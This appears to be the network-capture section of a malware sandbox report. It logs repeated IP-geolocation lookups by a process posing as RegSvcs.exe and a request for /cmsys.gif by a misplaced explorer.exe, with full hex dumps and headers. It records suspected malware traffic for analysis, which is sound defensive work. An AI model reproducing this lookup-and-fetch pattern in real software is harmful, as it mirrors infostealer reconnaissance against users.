                                                                                                                                                                                                                                                    2024-10-29 12:08:02 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.549708188.114.96.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:03 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    2024-10-29 12:08:03 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:03 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11193
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JvJQUajUeICNxGBe%2FG3b1DGUAKV2GfQgYwAv6IhmAF05Ueyk8IAh0wTJ1AAuBQFh%2BCKFDwCwRwUIOLZFD4z8w2GX7bG7KtQTXuTFXX98i2TyZKPI8RVP24BpJJPlTcxhLPGW%2BBE2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30c7d8f60e5f2-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1324&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2278520&cwnd=251&unsent_bytes=0&cid=0fb9bea8095b9812&ts=148&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:03 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.549710188.114.97.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:05 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    2024-10-29 12:08:05 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:05 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11195
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZCmrEGAV46Du6Zje9nOmhl0T5jUYJltcCGAwHHkCmPR0ZCXor5esoDDfonXscqCBtfPwT1F2lBAG9qf9%2B0x93%2FQaxsYPgC1xY3wQELtiFZflKcjQJLsIe0dRet28TFbN15rHXcp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30c897bbf6b4c-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2344939&cwnd=233&unsent_bytes=0&cid=1d09ffebdc7df716&ts=152&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:05 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.2.549713188.114.97.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:07 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    2024-10-29 12:08:07 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:07 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11197
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nn7Hx1BfPxVYgoGxjvsSOZCETmoB7ox2Im4h1qjQODD8aBqs7bWk29rvpGno8NZ1G2cjo1u40KbaSWVSnHxvFPuiBzM2BbPePAoeX%2FpkEBMl0zT1vlWRgCOs%2BnUMvhcrTcWJlQGQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30c9488ace510-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1255&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2553791&cwnd=251&unsent_bytes=0&cid=e6fb92c1555a6a5a&ts=247&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:07 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    4192.168.2.549715188.114.97.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:08 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    2024-10-29 12:08:08 UTC895INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:08 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11198
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=upPP65tq%2FybfndCMIrJeEPkXxtFK6c%2B%2BqZrujlu3zzdrWWPFBQF7ssiuZSpBqa6kPb0acGeYn0bHkNlH0D7nIB0x5U1x%2FrSO%2BGmJh1PueQeb%2F%2Fva9eXtqq0Yj%2FPDQSogZ3xswKss"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30c9eca846b3c-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1984&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1490478&cwnd=251&unsent_bytes=0&cid=792364b3416e12d3&ts=150&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:08 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    5192.168.2.549718188.114.97.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:10 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    2024-10-29 12:08:10 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:10 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11200
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FetjLiaZel2%2FgclR4jVAjXZgcRx3YBQq%2B4Na%2BbqSdAlvuRO%2BKEd996SKvAkCADogO01lTB1%2BQSzSGfKcoLe03eMGDQBcY9aNusF85Ixky0P6fQS7%2BLjhSnM%2BA8C7WBTwT%2BQAkDz3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30ca90f816bcb-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1710&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1720736&cwnd=251&unsent_bytes=0&cid=2dd330d85018fa1b&ts=150&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:10 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    6192.168.2.54971951.81.194.2024432920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:11 UTC193OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Host: zxq.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:11 UTC614INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                    link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                    x-redirect-by: WordPress
                                                                                                                                                                                                                                                    location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                                                                                                                                                                                    x-litespeed-cache: hit
                                                                                                                                                                                                                                                    content-length: 0
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:11 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    7192.168.2.549721188.114.97.34435568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:11 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                                    2024-10-29 12:08:12 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:12 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 11202
                                                                                                                                                                                                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OE%2BJILuQTAy%2B4hKzJv1wi1S3lrcgLSnQyBEutEyZN3zjyI0sDerSECsODXmuHagAj%2BCadeb5xaoixbIwM6K9bH%2F1yoA1hELOakQHOW1gMfpzh4oD3xAeBuXG166M7f4HbqZGtxIr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8da30cb349d84648-DFW
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=997&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2946083&cwnd=32&unsent_bytes=0&cid=c699e093a3df5538&ts=158&x=0"
                                                                                                                                                                                                                                                    2024-10-29 12:08:12 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    8192.168.2.54972251.81.194.2024432920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:12 UTC221OUTGET /what-happened-to-the-old-zxq-website/ HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Host: zxq.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:13 UTC592INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                    link: <https://zxq.net/wp-json/wp/v2/pages/187>; rel="alternate"; type="application/json"
                                                                                                                                                                                                                                                    link: <https://zxq.net/?p=187>; rel=shortlink
                                                                                                                                                                                                                                                    etag: "114140-1729962654;;;"
                                                                                                                                                                                                                                                    x-litespeed-cache: hit
                                                                                                                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:12 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                    2024-10-29 12:08:13 UTC776INData Raw: 64 65 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 73 2d 64 61 72 6b 20 73 69 74 65 2d 73 2d 64 61 72 6b 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61 78 2d 73 6e 69 70 70
                                                                                                                                                                                                                                                    Data Ascii: de99<!DOCTYPE html><html lang="en-US" class="s-dark site-s-dark"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='index, follow, max-image-preview:large, max-snipp
